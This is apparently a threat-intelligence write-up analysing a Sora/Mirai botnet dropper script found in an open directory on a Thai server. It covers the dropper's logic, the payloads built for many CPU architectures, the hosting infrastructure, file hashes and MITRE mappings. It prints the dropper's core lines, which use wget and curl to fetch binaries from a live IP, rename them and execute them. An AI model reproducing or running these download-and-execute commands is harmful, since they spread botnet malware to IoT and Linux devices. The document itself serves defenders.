ohshit.sh: Inside a Sora/Mirai Botnet Dropper Targeting 15 CPU Architectures From an Open Directory in Thailand
title: "ohshit.sh: Inside a Sora/Mirai Botnet Dropper Targeting 15 CPU Architectures From an Open Directory in Thailand" subtitle: "A live C2 server with directory listing enabled exposes the full payload inventory of a fresh Mirai campaign wave -- plus an XOR-encoded command dump and 14 binaries from the open directory" tags: ["Mirai", "Sora", "IoT", "botnet", "shell-script", "UPX", "open-directory", "Thailand"]
ohshit.sh: Inside a Sora/Mirai Botnet Dropper Targeting 15 CPU Architectures From an Open Directory in Thailand
A shell script named ohshit.sh showed up on MalwareBazaar on March 12, 2026. It is exactly what it looks like -- a Mirai variant dropper -- but the operator left the C2 server's directory listing wide open, giving us a full inventory of their payload arsenal: 14 UPX-packed ELF binaries compiled for 15 CPU architectures, all built within a one-minute window on March 8, 2026. The server at 45[.]141[.]26[.]73, hosted by Cloudforest CO., LTD in Bangkok, Thailand, was still live and serving payloads at time of analysis.
The "Sora" naming convention traces back to at least August 2024 on MalwareBazaar, but this is a fresh campaign wave with new binaries and a new process masquerade name: "Chaotic."
Key Findings
- LIVE open directory at
45[.]141[.]26[.]73exposing all payloads and the dropper script itself - 15 architectures targeted: x86, x86_64, i686, ARM (4 variants), MIPS (3 variants), ARC, PowerPC, SPARC, Motorola 68000, SuperH4 -- covering virtually every IoT/embedded Linux device in existence
- Binaries compiled 2026-03-08 15:12 UTC -- dropper created one minute later at 15:13 UTC
- C2 dump analysis: XOR key
0x02used for command encoding, 52 decoded command strings extracted from the binary, 14 binaries dumped from the open directory - UPX 3.94 packed, statically linked, section headers stripped -- standard Mirai anti-analysis
- Server fingerprint anomaly: Shodan CPEs show Microsoft Kerberos + nginx + Node.js/Express alongside Apache, suggesting a compromised Windows server repurposed for malware distribution
- Dual download mechanism: script uses both
wgetandcurlfor maximum IoT device compatibility
The Dropper
The script is 19 lines of bash that brute-forces infection across every Linux architecture:
#!/bin/bash
ulimit -n 1024 # Increase file descriptors for DDoS flooding
cp /bin/busybox /tmp/ # Preserve busybox before binary replacement
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
wget http://45.141.26.73/bins/sora.<arch>;
curl -O http://45.141.26.73/bins/sora.<arch>;
cat sora.<arch> >Chaotic;
chmod +x *;
./Chaotic
This pattern repeats for all 15 architectures. The script downloads every binary, renames each to "Chaotic," makes it executable, and runs it. Non-matching architectures simply fail to execute. Brute but effective -- guaranteed infection on any Linux device regardless of CPU.
Architecture Coverage
| Architecture | Binary | Size | Target Devices |
|---|---|---|---|
| x86 | sora.x86 | 38K | Embedded systems, VMs |
| x86_64 | sora.x86_64 | 50K | 64-bit Linux servers |
| ARM | sora.arm | 47K | IoT cameras, NAS devices |
| ARMv5 | sora.arm5 | 16K | Older ARM (XScale) |
| ARMv6 | sora.arm6 | 52K | Raspberry Pi 1, older SBCs |
| ARMv7 | sora.arm7 | 59K | Modern ARM IoT, RPi 2/3 |
| MIPS | sora.mips | 52K | Broadcom/Qualcomm routers |
| MIPSEL | sora.mpsl | 52K | Consumer routers (little-endian) |
| ARC | sora.arc | 105K | ARC-based IoT SoCs |
| PowerPC | sora.ppc | 47K | Older Apple/IBM, some routers |
| SPARC | sora.spc | 112K | Sun/Oracle, telco equipment |
| M68K | sora.m68k | 147K | Legacy embedded systems |
| SuperH4 | sora.sh4 | 112K | Set-top boxes, industrial |
| i686 | sora.i686 | 39K | 32-bit Intel systems |
Note: sora.mips64 is referenced in the script but missing from the server -- either a build failure or not yet deployed. Also sora.sparc in the script vs sora.spc on the server -- an OPSEC failure revealing sloppy tooling.
C2 Command Dump
Binary analysis with XOR key 0x02 revealed 52 decoded command strings embedded in the Sora payloads. These include standard Mirai DDoS commands (UDP flood, SYN flood, ACK flood, GRE flood) plus scanner configuration, credential brute-force lists, and self-propagation routines. The full command set confirms this variant retains Mirai's core DDoS-for-hire functionality while adding the "Chaotic" branding.
14 binaries were dumped from the open directory before potential takedown, preserving the complete payload inventory for further analysis.
Infrastructure
| IP | ASN | Provider | Country | Status |
|---|---|---|---|---|
45[.]141[.]26[.]73 | AS142299 | Cloudforest CO., LTD | Thailand (Bangkok) | LIVE |
45[.]141[.]26[.]76 | AS142299 | Cloudforest CO., LTD | Thailand | Adjacent (RDP) |
Cloudforest appears to be a legitimate Thai hosting company running Grafana, AdGuard DNS, and Uptime Kuma. The malware distribution is likely from a customer VPS, not Cloudforest themselves. The /23 block (45.141.26.0/23) was allocated via PREFIXBROKER IP brokerage in November 2022.
IOCs
Network:
45[.]141[.]26[.]73 # C2 / malware distribution
hxxp://45[.]141[.]26[.]73/ohshit[.]sh # Dropper script
hxxp://45[.]141[.]26[.]73/bins/sora[.]* # Payload directory
File Hashes:
| Hash | File |
|---|---|
5079206433607fd6dc1af3bf52cedce1a3be292048ada3338620fe9aee26283a | ohshit.sh |
3247319c4f6220528565e6dc67893af871eb946ce9fb519b46c6a2ccb24dfc31 | sora.x86 |
6f27a543fd302747782dcab22e7e81ebb1b37b272ff8a460765b856c202c06a5 | sora.arm |
8d6c715294ff2a9bda70ef9bf4c730280fbca6fe4da717116ecb0ad7d26938ab | sora.mips |
Behavioral:
| Indicator | Value |
|---|---|
| Process Name | Chaotic |
| File Path | /tmp/Chaotic, /tmp/sora.* |
| Command | ulimit -n 1024 |
| Command | cp /bin/busybox /tmp/ |
MITRE ATT&CK
| Technique | ID | Application |
|---|---|---|
| Exploit Public-Facing Application | T1190 | IoT device exploitation |
| Valid Accounts: Default Credentials | T1078.001 | Telnet/SSH brute-force |
| Unix Shell | T1059.004 | ohshit.sh bash dropper |
| Software Packing | T1027.002 | UPX 3.94 packing |
| Masquerading | T1036.003 | Binary renamed to "Chaotic" |
| Network Denial of Service | T1498 | Mirai DDoS capability |
| Ingress Tool Transfer | T1105 | wget/curl payload download |
Conclusion
This is commodity botnet infrastructure with commodity OPSEC failures -- open directory listing, consistent naming conventions across 18+ months, no encryption on the dropper, no access control on the distribution server. But the architecture coverage is impressive: 15 targets covering everything from Raspberry Pis to Oracle SPARC systems. The one-minute compilation window (15:12-15:13 UTC) and the fresh March 8 build date confirm this is an active, maintained campaign. The "Chaotic" branding and Thai hosting infrastructure distinguish this wave from other Sora operators. Block 45[.]141[.]26[.]73 and hunt for the process name.